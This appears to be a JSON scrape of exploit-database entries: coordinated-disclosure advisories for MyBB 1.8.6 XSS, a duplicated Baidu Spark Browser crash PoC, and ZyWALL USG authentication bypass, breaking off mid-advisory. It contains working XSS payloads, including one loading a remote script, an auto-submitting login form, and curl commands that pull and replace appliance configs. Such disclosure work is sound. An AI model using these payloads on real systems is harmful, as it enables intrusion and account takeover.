{"zdt": [{"lastseen": "2018-04-10T01:46:21", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2016-11-10T00:00:00", "published": "2016-11-10T00:00:00", "href": "https://0day.today/exploit/description/26302", "id": "1337DAY-ID-26302", "type": "zdt", "title": "MyBB 1.8.6 - Cross-Site Scripting Vulnerability", "sourceData": "1. Introduction\r\n \r\nAffected Product: MyBB 1.8.6\r\nFixed in: 1.8.7\r\nFixed Version Link: http://resources.mybb.com/downloads/mybb_1807.zip\r\nVendor Website: http://www.mybb.com/\r\nVulnerability Type: XSS\r\nRemote Exploitable: Yes\r\nReported to vendor: 01/29/2016\r\nDisclosed to public: 09/15/2016\r\nRelease mode: Coordinated Release\r\nCVE: n/a\r\nCredits Tim Coen of Curesec GmbH\r\n \r\n2. Overview\r\n \r\nMyBB is forum software written in PHP. In version 1.8.6, it contains various\r\nXSS vulnerabilities, some of which are reflected and some of which are\r\npersistent. Some of them depend on custom forum or server settings.\r\n \r\nThese issues may lead to the injection of JavaScript keyloggers, injection of\r\ncontent such as ads, or the bypassing of CSRF protection, which would for\r\nexample allow the creation of a new admin user.\r\n \r\n3. Details\r\n \r\nXSS 1: Persistent XSS - Signature\r\n \r\nCVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N\r\n \r\nDescription: The profile editor of the moderator control panel does not\r\nproperly encode the signature of a user when editing it. 
Because of this, a\r\nuser can create a specifically crafted signature and - once a moderator or\r\nadmin visits the profile editor for that user - the injected code will be\r\nexecuted in the context of the victim's browser.\r\n \r\nProof of Concept:\r\n \r\nVisit the profile at: http://localhost/mybb_1806/Upload/modcp.php?action=editprofile&uid=[USER_ID] As signature, use: </textarea><img src=no onerror=alert(1)>\r\n \r\nXSS 2: Persistent XSS - Forum Post (depending on forum settings)\r\n \r\nCVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N\r\n \r\nDescription: An admin can allow HTML input for specific forums via the setting\r\nallowhtml. There are various filters in place which are intended to make this safe,\r\nwhich may leave the admin with the impression that it is indeed safe. However,\r\nthere are various possibilities to bypass these filters, mainly using HTML5\r\nfeatures.\r\n \r\nProof of Concept:\r\n \r\n<body onpageshow=alert(1)> -> Visiting the post will trigger the code <div\r\ncontextmenu=\"mymenu\" oncontextmenu=alert(1)>context menu</pre> -> A right-click\r\nwill trigger the code <form action=\"\"> Enter something: <input type=\"text\" name\r\n=\"myinput\" oninput=\"alert(1)\"><br> <input type=\"submit\" value=\"Submit\"> </form>\r\n-> Input into the field will trigger the code <form action=\"\"> <input type=\r\n\"text\" name=\"myinput\" oninvalid=\"alert(1)\" required> <input type=\"submit\" value\r\n=\"Submit\"> </form> -> A click on submit will trigger the code\r\n \r\nThere are various other attributes which may also work, such as onsearch,\r\nonkeydown, onkeyup, ondrag, onscroll, oncopy, and so on. Other attributes such\r\nas onMouseOver or onFocus are filtered out.\r\n \r\nXSS 3: Persistent XSS - Username (depending on forum settings)\r\n \r\nCVSS: Low 2.6 AV:N/AC:H/Au:N/C:N/I:P/A:N\r\n \r\nDescription: The username is echoed unencoded in the user area. 
As the login\r\ndoes not have CSRF protection and as an admin can be logged into the admin area\r\nwith a different account than the one they are logged into the forum, a\r\npersistent XSS vulnerability in the user area can be exploited. However,\r\nsuccessful exploitation most likely requires a username length of at least 43\r\ncharacters, which is more than the default settings allow.\r\n \r\nSimple Proof of Concept:\r\n \r\n1. register user with name f\" onmouseover=\"alert(1)\" b=\" 2. login and visit\r\nhttp://localhost/mybb_1805/Upload/usercp.php 3. hover over the avatar\r\n \r\nThe simple proof of concept can be improved to allow successful exploitation.\r\nIt is not required for the victim to hover over the avatar or interact with the\r\nwebpage in any way:\r\n \r\n1. As username, use: f\" onerror=\"alert(1)\" b=\" 2. Set an avatar, and use a URL\r\nas source (not an image upload) 3. Delete the image from the remote host,\r\nmaking it unavailable, thus triggering an error and executing the injected\r\ncode.\r\n \r\nPossible Payloads:\r\n \r\nLoading a script with vanilla javascript takes a lot more characters than are\r\nallowed in a username by default:\r\n \r\n\"onerror=\"s=document.createElement('script');s.src='http://localhost/s.js';\r\ndocument.getElementById('top').appendChild(s)\"\r\n \r\nAs jQuery is loaded, this can be optimized:\r\n \r\n\"onerror=\"$.getScript('http://aa.bc/s.js')\r\n \r\nExecuting the payload for a victim:\r\n \r\nThe attack does not require the victim to not be logged in as normal user, as\r\none can login even when already logged in. The login as a normal user also does\r\nnot affect the login as admin. 
Thus, an attacker could use the following\r\npayload to log a victim in and redirect them to the site containing the\r\npayload:\r\n \r\n<iframe id=\"myframe\" style=\"display: none\" name=\"myframe\" src=\"about:blank\"></\r\niframe> <form method=\"post\" action=\"http://localhost/mybb_1805/Upload/\r\nmember.php\" target=\"myframe\" id=\"myform\" name=\"myform\"> <input name=\"action\"\r\ntype=\"hidden\" value=\"do_login\" /> <input name=\"url\" type=\"hidden\" value=\"http:/\r\n/localhost/mybb_1805/Upload/usercp.php\" /> <input name=\"quick_login\" type=\r\n\"hidden\" value=\"1\" /> <input name=\"quick_username\" type=\"hidden\" value=\r\n\"\"onerror=\"$.getScript('http://localhost/s.js')\" /> <input name=\r\n\"quick_password\" type=\"hidden\" value=\"123456\" /> <input name=\"quick_remember\"\r\ntype=\"hidden\" value=\"yes\" /> </form> <script>document.myform.submit();</script>\r\n \r\nIt will automatically log the victim in and redirect them to the page that\r\ntriggers the script execution. No action of the victim is required. The loaded\r\nscript could for example perform a backup of the database and then send the\r\nattacker the name of the backup, as backups are stored in a public directory.\r\n \r\nXSS 4: Persistent XSS - Post Attachment (depending on server settings)\r\n \r\nCVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N\r\n \r\nDescription: Attachments are uploaded to a public directory, and their\r\nextension is changed to .attach. Files with extension .attach that contain HTML\r\ncode are interpreted as HTML files by some default server configurations (for\r\nexample Apache). Additionally, the directory where the files are uploaded to\r\ndoes not prevent directory listing via an index.html file as all the other\r\ndirectories of MyBB do. Because of this, an attacker can find the name of the\r\nfile and send it to a victim. Once the victim visits the link, the JavaScript\r\ncode in the file would execute.\r\n \r\nProof of Concept:\r\n \r\n1. 
upload HTML file containing <html><body><script>alert(1);</script></body></\r\nhtml> 2. find file located at /mybb_1805/Upload/uploads/YYYMM/\r\nRANDOM_STRING.attach. The YYYMM directory is not protected against directory\r\nbrowsing via an index.php or index.html file like most other directories of\r\nMyBB, which means depending on the server configuration, the file can easily be\r\nfound 3. send admin there\r\n \r\nXSS 5: Reflected XSS - Account Activation\r\n \r\nCVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N\r\n \r\nDescription: The account activation form echoes a given code unencoded to the\r\nuser, resulting in reflected XSS.\r\n \r\nProof of Concept:\r\n \r\nhttp://localhost/mybb_1806/Upload/member.php?action=activate&uid=-1&code=\">\r\n<script>alert(1)<%2fscript>\r\n \r\nXSS 6: Reflected XSS - Update (depending on locked state)\r\n \r\nCVSS: Low 2.6 AV:N/AC:H/Au:N/C:N/I:P/A:N\r\n \r\nDescription: In many of the update scripts, POST values are echoed without\r\nproper encoding. The scripts are upgrade3.php, upgrade12.php, upgrade13.php,\r\nupgrade17.php, and upgrade30.php. As this attack only works when the forum is\r\ndisabled, the forum itself cannot be attacked, but the attack could be used to\r\nattack other software hosted on the same domain.\r\n \r\nProof of Concept:\r\n \r\n<form id=\"myForm\" action=\"http://localhost/mybb_1805/Upload/install/\r\nupgrade.php\" method=\"POST\"> <input name=\"action\" value=\"30_dbchanges_ip\">\r\n<input name=\"iptask\" value=\"5\"> <input name=\"iptable\" value=\"7\"> <input name=\r\n\"ipstart\" value=\"<script>alert(1)</script>\"> <input type=\"submit\" value=\r\n\"Submit\"> </form> <script> document.getElementById(\"myForm\").submit(); </\r\nscript>\r\n \r\nXSS 7: Reflected CSS Injection\r\n \r\nCVSS: Low 2.6 AV:N/AC:H/Au:N/C:N/I:P/A:N\r\n \r\nDescription: When displaying an error, MyBB echoes user input in a style\r\ncontext, allowing an attacker to inject CSS. 
With this, it may be possible to\r\nchange the look of the website or extract information, and it may lead to XSS\r\nin older browsers.\r\n \r\nProof of Concept:\r\n \r\nThis script submits a search, which will trigger an SQL error because of the\r\nnon-existing author. All it does then is change the background color of the\r\nerror report to black to show the existence of the injection:\r\n \r\n<form id=\"myForm\" action=\"http://localhost/mybb_1805/Upload/search.php/) ; }\r\n%23error { background: %23000000; } /*\" method=\"POST\"> <input name=\"action\"\r\nvalue=\"do_search\"> <input name=\"author\" value=\"nonexistentauthor\"> <input name=\r\n\"matchusername\" value=\"1\"> </form> <script> document.getElementById\r\n(\"myForm\").submit(); </script>\r\n \r\n4. Solution\r\n \r\nTo mitigate this issue please upgrade at least to version 1.8.7:\r\n \r\nhttp://resources.mybb.com/downloads/mybb_1807.zip\r\n \r\nPlease note that a newer version might already be available.\r\n \r\n5. Report Timeline\r\n \r\n01/29/2016 Informed Vendor about Issue\r\n02/26/2016 Vendor requests more time\r\n03/11/2016 Vendor releases fix\r\n09/15/2016 Disclosed to public\r\n \r\n \r\nBlog Reference:\r\nhttps://www.curesec.com/blog/article/blog/MyBB-186-XSS-160.html\r\n \r\n--\r\nblog: https://www.curesec.com/blog\r\ntweet: https://twitter.com/curesec\n\n# 0day.today [2018-04-10] #", "sourceHref": "https://0day.today/exploit/26302", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-01-01T07:03:32", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category dos / poc", "modified": "2014-08-25T00:00:00", "published": "2014-08-25T00:00:00", "id": "1337DAY-ID-22545", "href": "https://0day.today/exploit/description/22545", "type": "zdt", "title": "Baidu Spark Browser v26.5.9999.3511 Remote Stack Overflow DoS", "sourceData": "<!--\r\n\r\nBaidu Spark Browser v26.5.9999.3511 Remote Stack Overflow Vulnerability (DoS)\r\n\r\n\r\nVendor: Baidu, Inc.\r\nProduct 
web page: http://www.baidu.com\r\nAffected version: 26.5.9999.3511\r\n\r\nSummary: Spark Browser is a free Internet browser with very\r\nsharp UIs and cool utilities. It's based on the Chromium\r\ntechnology platform, giving it fast browsing capabilities.\r\n\r\nDesc: Spark Browser version 26.5.9999.3511 allows remote\r\nattackers to cause a denial of service (application crash)\r\nresulting in stack overflow via nested calls to the window.print\r\njavascript function.\r\n\r\n-----------------------------------------------------------------\r\n\r\n(153c.14f4): Stack overflow - code c00000fd (first chance)\r\nFirst chance exceptions are reported before any exception handling.\r\nThis exception may be expected and handled.\r\neax=000000b0 ebx=003d0000 ecx=003d0000 edx=5000016b esi=00000000 edi=0000010c\r\neip=77e0decf esp=03d23000 ebp=03d230c4 iopl=0 nv up ei pl nz na po nc\r\ncs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210202\r\nntdll!memcpy+0xbb8f:\r\n77e0decf 56 push esi\r\n\r\n-----------------------------------------------------------------\r\n\r\nTested on: Microsoft Windows 7 Professional SP1 (EN)\r\nMicrosoft Windows 7 Ultimate SP1 (EN)\r\n\r\n\r\nVulnerability discovered by Gjoko 'LiquidWorm' Krstic\r\n@zeroscience\r\n\r\n\r\nAdvisory ID: ZSL-2014-5190\r\nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5190.php\r\n\r\n\r\n28.06.2014\r\n\r\n-->\r\n\r\n\r\n<html>\r\n<title>Baidu Spark Browser v26.5.9999.3511 Remote Stack Overflow DoS PoC</title>\r\n<body bgcolor=\"#50708C\">\r\n<center>\r\n<p><font color=\"#e3e3e3\">Baidu Spark Browser v26.5.9999.3511 Remote Stack Overflow DoS\r\nPoC</font></p>\r\n<button onClick=crash()>Execute!</button>\r\n</center>\r\n<script>\r\nfunction crash(){\r\nwindow.print();\r\ncrash();\r\n}\r\n</script>\r\n</body>\r\n</html>\n\n# 0day.today [2018-01-01] #", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/22545"}, 
{"lastseen": "2018-01-02T09:14:25", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category dos / poc", "modified": "2014-07-04T00:00:00", "published": "2014-07-04T00:00:00", "id": "1337DAY-ID-22402", "href": "https://0day.today/exploit/description/22402", "type": "zdt", "title": "Baidu Spark Browser v26.5.9999.3511 - Remote Stack Overflow Vulnerability (DoS)", "sourceData": "<!--\r\n \r\nBaidu Spark Browser v26.5.9999.3511 Remote Stack Overflow Vulnerability (DoS)\r\n \r\n \r\nVendor: Baidu, Inc.\r\nProduct web page: http://www.baidu.com\r\nAffected version: 26.5.9999.3511\r\n \r\nSummary: Spark Browser is a free Internet browser with very\r\nsharp UIs and cool utilities. It's based on the Chromium\r\ntechnology platform, giving it fast browsing capabilities.\r\n \r\nDesc: Spark Browser version 26.5.9999.3511 allows remote\r\nattackers to cause a denial of service (application crash)\r\nresulting in stack overflow via nested calls to the window.print\r\njavascript function.\r\n \r\n-----------------------------------------------------------------\r\n \r\n(153c.14f4): Stack overflow - code c00000fd (first chance)\r\nFirst chance exceptions are reported before any exception handling.\r\nThis exception may be expected and handled.\r\neax=000000b0 ebx=003d0000 ecx=003d0000 edx=5000016b esi=00000000 edi=0000010c\r\neip=77e0decf esp=03d23000 ebp=03d230c4 iopl=0 nv up ei pl nz na po nc\r\ncs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210202\r\nntdll!memcpy+0xbb8f:\r\n77e0decf 56 push esi\r\n \r\n-----------------------------------------------------------------\r\n \r\nTested on: Microsoft Windows 7 Professional SP1 (EN)\r\n Microsoft Windows 7 Ultimate SP1 (EN)\r\n \r\n \r\nVulnerability discovered by Gjoko 'LiquidWorm' Krstic\r\n @zeroscience\r\n \r\n \r\nAdvisory ID: ZSL-2014-5190\r\nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5190.php\r\n \r\n \r\n28.06.2014\r\n \r\n-->\r\n \r\n \r\n<html>\r\n<title>Baidu 
Spark Browser v26.5.9999.3511 Remote Stack Overflow DoS PoC</title>\r\n<body bgcolor=\"#50708C\">\r\n<center>\r\n<p><font color=\"#e3e3e3\">Baidu Spark Browser v26.5.9999.3511 Remote Stack Overflow DoS PoC</font></p>\r\n<button onClick=crash()>Execute!</button>\r\n</center>\r\n<script>\r\nfunction crash(){\r\n window.print();\r\n crash();\r\n}\r\n</script>\r\n</body>\r\n</html>\n\n# 0day.today [2018-01-02] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/22402"}, {"lastseen": "2018-03-10T02:02:44", "bulletinFamily": "exploit", "description": "Exploit for hardware platform in category remote exploits", "modified": "2011-05-04T00:00:00", "published": "2011-05-04T00:00:00", "id": "1337DAY-ID-16040", "href": "https://0day.today/exploit/description/16040", "type": "zdt", "title": "ZyWALL USG Appliance Multiple Vulnerabilities", "sourceData": "Advisory: Authentication Bypass in Configuration Import and Export of\r\n ZyXEL ZyWALL USG Appliances\r\n \r\nUnauthenticated users with access to the management web interface of\r\ncertain ZyXEL ZyWALL USG appliances can download and upload\r\nconfiguration files, that are applied automatically.\r\n \r\n \r\nDetails\r\n=======\r\n \r\nProduct: ZyXEL USG (Unified Security Gateway) appliances\r\n ZyWALL USG-20\r\n ZyWALL USG-20W\r\n ZyWALL USG-50\r\n ZyWALL USG-100\r\n ZyWALL USG-200\r\n ZyWALL USG-300\r\n ZyWALL USG-1000\r\n ZyWALL USG-1050\r\n ZyWALL USG-2000\r\n Possibly other ZLD-based products\r\nAffected Versions: Firmware Releases before April 25, 2011\r\nFixed Versions: Firmware Releases from or after April 25, 2011\r\nVulnerability Type: Authentication Bypass\r\nSecurity Risk: high\r\nVendor URL: http://www.zyxel.com/\r\nVendor Status: fixed version released\r\nAdvisory URL: http://www.redteam-pentesting.de/advisories/rt-sa-2011-003\r\nAdvisory Status: published\r\nCVE: GENERIC-MAP-NOMATCH\r\nCVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH\r\n \r\n 
\r\nIntroduction\r\n============\r\n \r\n``The ZyWALL USG (Unified Security Gateway) Series is the \"third\r\ngeneration\" ZyWALL featuring an all-new platform. It provides greater\r\nperformance protection, as well as a deep packet inspection security\r\nsolution for small businesses to enterprises alike. It embodies a\r\nStateful Packet Inspection (SPI) firewall, Anti-Virus, Intrusion\r\nDetection and Prevention (IDP), Content Filtering, Anti-Spam, and VPN\r\n(IPSec/SSL/L2TP) in one box. This multilayered security safeguards your\r\norganization's customer and company records, intellectual property, and\r\ncritical resources from external and internal threats.''\r\n \r\n(From the vendor's homepage)\r\n \r\n \r\nMore Details\r\n============\r\n \r\nDuring a penetration test, a ZyXEL ZyWALL USG appliance was found and\r\ntested for security vulnerabilities. The following sections first\r\ndescribe how the appliance's filesystem can be extracted from the\r\nencrypted firmware upgrade zip files. Afterwards it is shown how\r\narbitrary configuration files can be uploaded to and downloaded from the\r\nappliance. This way, a custom user account with a chosen password can\r\nbe added to the running appliance without the need for a reboot.\r\n \r\n \r\nDecrypting the ZyWALL Firmware Upgrade Files\r\n--------------------------------------------\r\n \r\nFirmware upgrade files for ZyXEL ZyWALL USG appliances consist of a\r\nregularly compressed zip file, which contains, among other files, two\r\nencrypted zip files with the main firmware. 
For example, the current\r\nfirmware version 2.21(BQD.2) for the ZyWALL USG 20 (\"ZyWALL USG\r\n20_2.21(BDQ.2)C0.zip\") contains the following files:\r\n \r\n -rw-r--r-- 1 user user 43116374 Sep 30 2010 221BDQ2C0.bin\r\n -rw-r--r-- 1 user user 7354 Sep 30 2010 221BDQ2C0.conf\r\n -rw-r--r-- 1 user user 28395 Sep 30 2010 221BDQ2C0.db\r\n -rw-r--r-- 1 user user 703402 Oct 12 17:48 221BDQ2C0.pdf\r\n -rw-r--r-- 1 user user 3441664 Sep 30 2010 221BDQ2C0.ri\r\n -rw-r--r-- 1 user user 231 Sep 30 2010 firmware.xml\r\n \r\nThe files 221BDQ2C0.bin and 221BDQ2C0.db are encrypted zip files that\r\nrequire a password for decompression. Listing the contents is\r\npossible:\r\n \r\n $ unzip -l 221BDQ2C0.bin\r\n Archive: 221BDQ2C0.bin\r\n Length Date Time Name\r\n --------- ---------- ----- ----\r\n 40075264 2010-09-15 06:32 compress.img\r\n 0 2010-09-30 04:48 db/\r\n 0 2010-09-30 04:48 db/etc/\r\n 0 2010-09-30 04:48 db/etc/zyxel/\r\n 0 2010-09-30 04:48 db/etc/zyxel/ftp/\r\n 0 2010-09-30 04:48 db/etc/zyxel/ftp/conf/\r\n 20 2010-09-14 14:46 db/etc/zyxel/ftp/conf/htm-default.conf\r\n 7354 2010-09-14 14:46 db/etc/zyxel/ftp/conf/system-default.conf\r\n 0 2010-09-30 04:48 etc_writable/\r\n 0 2010-09-30 04:48 etc_writable/budget/\r\n 0 2010-09-14 15:08 etc_writable/budget/budget.conf\r\n 0 2010-09-15 06:28 etc_writable/firmware-upgraded\r\n 81 2010-09-14 15:09 etc_writable/myzyxel_info.conf\r\n 243 2010-09-14 15:03 etc_writable/tr069ta.conf\r\n 0 2010-09-30 04:48 etc_writable/zyxel/\r\n 0 2010-09-30 04:48 etc_writable/zyxel/conf/\r\n 996 2010-09-15 06:28 etc_writable/zyxel/conf/__eps_checking_default.xml\r\n 42697 2010-09-14 14:46 etc_writable/zyxel/conf/__system_default.xml\r\n 95 2010-09-30 04:48 filechecksum\r\n 1023 2010-09-30 04:48 filelist\r\n 336 2010-09-30 04:48 fwversion\r\n 50 2010-09-15 06:34 kernelchecksum\r\n 3441664 2010-09-30 04:48 kernelusg20.bin\r\n 0 2010-09-14 14:46 wtp_image/\r\n --------- -------\r\n 43569823 24 files\r\n \r\n $ unzip -l 221BDQ2C0.db\r\n Archive: 
221BDQ2C0.db\r\n Length Date Time Name\r\n --------- ---------- ----- ----\r\n 0 2009-07-29 04:44 db_remove_lst\r\n 0 2010-09-15 06:28 etc/\r\n 0 2010-09-15 06:35 etc/idp/\r\n 39 2010-09-14 16:08 etc/idp/all.conf\r\n 25 2010-09-14 16:08 etc/idp/attributes.txt\r\n 639 2010-09-14 16:08 etc/idp/attributes_self.txt\r\n 277 2010-09-14 16:08 etc/idp/device.conf\r\n 39 2010-09-14 16:08 etc/idp/dmz.conf\r\n 39 2010-09-14 16:08 etc/idp/lan.conf\r\n 39 2010-09-14 16:08 etc/idp/none.conf\r\n 60581 2010-09-14 16:08 etc/idp/self.ref\r\n 5190 2010-09-14 16:08 etc/idp/self.rules\r\n 0 2010-09-14 16:08 etc/idp/update.ref\r\n 0 2010-09-14 16:08 etc/idp/update.rules\r\n 39 2010-09-14 16:08 etc/idp/wan.conf\r\n 445075 2010-09-14 16:08 etc/idp/zyxel.ref\r\n 327 2010-09-14 16:08 etc/idp/zyxel.rules\r\n 0 2010-09-14 16:05 etc/zyxel/\r\n 0 2010-09-15 06:35 etc/zyxel/ftp/\r\n 0 2010-09-15 06:35 etc/zyxel/ftp/.dha/\r\n 0 2010-09-15 06:35 etc/zyxel/ftp/.dha/dha_idp/\r\n 0 2010-09-15 06:35 etc/zyxel/ftp/cert/\r\n 0 2010-09-15 06:35 etc/zyxel/ftp/cert/trusted/\r\n 0 2010-09-15 06:35 etc/zyxel/ftp/conf/\r\n 20 2010-09-14 14:46 etc/zyxel/ftp/conf/htm-default.conf\r\n 7354 2010-09-14 14:46 etc/zyxel/ftp/conf/system-default.conf\r\n 0 2010-09-15 06:35 etc/zyxel/ftp/dev/\r\n 0 2010-09-15 06:35 etc/zyxel/ftp/idp/\r\n 0 2010-09-15 06:35 etc/zyxel/ftp/packet_trace/\r\n 0 2010-09-15 06:35 etc/zyxel/ftp/script/\r\n 1256 2010-09-15 06:35 filelist\r\n --------- -------\r\n 520939 31 files\r\n \r\nDuring a penetration test it was discovered that the file\r\n\"221BDQ2C0.conf\" (from the unencrypted firmware zip file) has exactly\r\nthe same size as the file \"system-default.conf\" contained in each\r\nencrypted zip. This can be successfully used for a known-plaintext\r\nattack[1] against these files, afterwards the decrypted zip-files can be\r\nextracted. 
However, please note that this attack only allows decrypting\r\nthe encrypted zip files; the password used for encrypting the files in\r\nthe first place is not revealed.\r\n \r\nAmong other tools, the following programs implement this attack:\r\n \r\n * PkCrack by Peter Conrad [2]\r\n * Elcomsoft Advanced Archive Password Recovery [3]\r\n \r\nAfterwards, the file \"compress.img\" from \"221BDQ2C0.bin\" can be\r\ndecompressed (e.g. by using the program \"unsquashfs\"), revealing the\r\nfilesystem for the appliance.\r\n \r\n \r\nWeb-Interface Authentication Bypass\r\n-----------------------------------\r\n \r\nZyWALL USG appliances can be managed over a web-based administrative\r\ninterface offered by an Apache http server. The interface requires\r\nauthentication prior to any actions; only some static files can be\r\nrequested without authentication.\r\n \r\nA custom Apache module \"mod_auth_zyxel.so\" implements the\r\nauthentication; it is configured in etc/service_conf/httpd.conf in the\r\nfirmware (see above). Several patterns are configured with the directive\r\n\"AuthZyxelSkipPattern\"; all URLs matching one of these patterns can be\r\naccessed without authentication:\r\n \r\n AuthZyxelSkipPattern /images/ /weblogin.cgi /I18N.js /language\r\n \r\nThe administrative interface consists of several programs which are\r\ncalled as CGI scripts. For example, accessing the following URL after\r\nlogging in with an admin account delivers the current startup\r\nconfiguration file:\r\n \r\n https://192.168.0.1/cgi-bin/export-cgi?category=config&arg0=startup-config.conf\r\n \r\nThe Apache httpd in the standard configuration allows appending\r\narbitrary paths to CGI scripts. The server saves the extra path in the\r\nenvironment variable PATH_INFO and executes the CGI script (this can be\r\ndisabled by setting \"AcceptPathInfo\" to \"off\"[4]). 
Therefore, appending\r\nthe string \"/images/\" and requesting the following URL also executes the\r\n\"export-cgi\" script and outputs the current configuration file:\r\n \r\n https://192.168.0.1/cgi-bin/export-cgi/images/?category=config&arg0=startup-config.conf\r\n \r\nDuring the penetration test it was discovered that for this URL, no\r\nauthentication is necessary (because the string \"/images/\" is included\r\nin the path-part of the URL) and arbitrary configuration files can be\r\ndownloaded. The file \"startup-config.conf\" can contain sensitive data\r\nlike firewall rules and hashes of user passwords. Other interesting\r\nconfig-file names are \"lastgood.conf\" and \"systemdefault.conf\".\r\n \r\nThe administrative interface furthermore allows uploading of\r\nconfiguration files with the \"file_upload-cgi\" script. Applying the\r\nsame trick (appending \"/images/\"), arbitrary configuration files can be\r\nuploaded without any authentication. When the chosen config-file name\r\nis set to \"startup-config.conf\", the appliance furthermore applies all\r\nsettings directly after uploading. This can be used to add a second\r\nadministrative user with a self-chosen password and take over the\r\nappliance.\r\n \r\n \r\nProof of Concept\r\n================\r\n \r\nThe current startup-config.conf file from a ZyWALL USG appliance can be\r\ndownloaded by accessing the following URL, e.g. with the program cURL:\r\n \r\n $ curl --silent -o startup-config.conf \\\r\n \"https://192.168.0.1/cgi-bin/export-cgi/images/?category=config&arg0=startup-config.conf\"\r\n \r\nThis file can be re-uploaded (e.g. 
after adding another administrative\r\nuser) with the following command; the parameter \"ext-comp-1121\" may need\r\nto be adjusted:\r\n \r\n $ curl --silent -F ext-comp-1121=50 -F file_type=config -F nv=1 \\\r\n -F \"[email\u00a0protected];filename=startup-config.conf\" \\\r\n https://192.168.0.1/cgi-bin/file_upload-cgi/images/\r\n \r\n \r\nWorkaround\r\n==========\r\n \r\nIf possible, disable the web-based administrative interface or else\r\nensure that the interface is not exposed to attackers.\r\n \r\n \r\nFix\r\n===\r\n \r\nUpgrade to a firmware released on or after April 25, 2011.\r\n \r\n \r\nSecurity Risk\r\n=============\r\n \r\nAny attackers who are able to access the administrative interface of\r\nvulnerable ZyWALL USG appliances can read and write arbitrary configuration\r\nfiles, thus compromising the complete appliance. Therefore the risk is\r\nestimated as high.\r\n \r\n \r\nHistory\r\n=======\r\n \r\n2011-03-07 Vulnerability identified\r\n2011-04-06 Customer approved disclosure to vendor\r\n2011-04-07 Vendor notified\r\n2011-04-07 First reactions of vendor, issue is being investigated\r\n2011-04-08 Meeting with vendor\r\n2011-04-15 Vulnerability fixed by vendor\r\n2011-04-18 Test appliance and beta firmware supplied to\r\n RedTeam Pentesting, fix verified\r\n2011-04-25 Vendor released new firmwares with fix\r\n2011-04-29 Vendor confirms that other ZLD-based devices may also be\r\n affected\r\n2011-05-04 Advisory released\r\n \r\nRedTeam Pentesting would like to thank ZyXEL for the fast response and\r\nprofessional collaboration.\r\n \r\n \r\nReferences\r\n==========\r\n \r\n[1] ftp://utopia.hacktic.nl/pub/crypto/cracking/pkzip.ps.gz\r\n[2] http://www.unix-ag.uni-kl.de/~conrad/krypto/pkcrack.html\r\n[3] http://www.elcomsoft.com/archpr.html\r\n[4] http://httpd.apache.org/docs/2.0/mod/core.html#acceptpathinfo\r\n \r\n \r\nRedTeam Pentesting GmbH\r\n=======================\r\n \r\nRedTeam Pentesting offers individual penetration tests, short 
pentests,\r\nperformed by a team of specialised IT-security experts. This uncovers security\r\nweaknesses in company networks or products so that they can be\r\nfixed immediately.\r\n \r\nAs there are only a few experts in this field, RedTeam Pentesting wants to\r\nshare its knowledge and enhance the public knowledge with research in\r\nsecurity-related areas. The results are made available as public\r\nsecurity advisories.\r\n \r\nMore information about RedTeam Pentesting can be found at\r\nhttp://www.redteam-pentesting.de.\r\n \r\n \r\n-- \r\nRedTeam Pentesting GmbH Tel.: +49 241 963-1300\r\nDennewartstr. 25-27 Fax : +49 241 963-1304\r\n52068 Aachen http://www.redteam-pentesting.de/\r\nGermany Register court: Aachen HRB 14004\r\nManaging directors: Patrick Hof, Jens Liebchen, Claus R. F. Overbeck\r\n \r\n \r\nAdvisory: Client Side Authorization ZyXEL ZyWALL USG Appliances Web\r\n Interface\r\n \r\nThe ZyXEL ZyWALL USG appliances perform parts of the authorization for\r\ntheir management web interface on the client side using JavaScript. 
By\r\nsetting the JavaScript variable \"isAdmin\" to \"true\", a user with limited\r\naccess gets full access to the web interface.\r\n \r\n \r\nDetails\r\n=======\r\n \r\nProduct: ZyXEL USG (Unified Security Gateway) appliances\r\n ZyWALL USG-20\r\n ZyWALL USG-20W\r\n ZyWALL USG-50\r\n ZyWALL USG-100\r\n ZyWALL USG-200\r\n ZyWALL USG-300\r\n ZyWALL USG-1000\r\n ZyWALL USG-1050\r\n ZyWALL USG-2000\r\n Possibly other ZLD-based products\r\nAffected Versions: Firmware Releases before April 25, 2011\r\nFixed Versions: Firmware Releases from or after April 25, 2011\r\nVulnerability Type: Client Side Authorization\r\nSecurity Risk: medium\r\nVendor URL: http://www.zyxel.com/\r\nVendor Status: fixed version released\r\nAdvisory URL: http://www.redteam-pentesting.de/advisories/rt-sa-2011-004\r\nAdvisory Status: published\r\nCVE: GENERIC-MAP-NOMATCH\r\nCVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH\r\n \r\n \r\nIntroduction\r\n============\r\n \r\n``The ZyWALL USG (Unified Security Gateway) Series is the \"third\r\ngeneration\" ZyWALL featuring an all-new platform. It provides greater\r\nperformance protection, as well as a deep packet inspection security\r\nsolution for small businesses to enterprises alike. It embodies a\r\nStateful Packet Inspection (SPI) firewall, Anti-Virus, Intrusion\r\nDetection and Prevention (IDP), Content Filtering, Anti-Spam, and VPN\r\n(IPSec/SSL/L2TP) in one box. This multilayered security safeguards your\r\norganization's customer and company records, intellectual property, and\r\ncritical resources from external and internal threats.''\r\n \r\n(From the vendor's homepage)\r\n \r\n \r\nMore Details\r\n============\r\n \r\nUsers with the role \"limited-admin\" are allowed to log into the\r\nweb-based administrative interface and configure some aspects of a\r\nZyWALL USG appliance. 
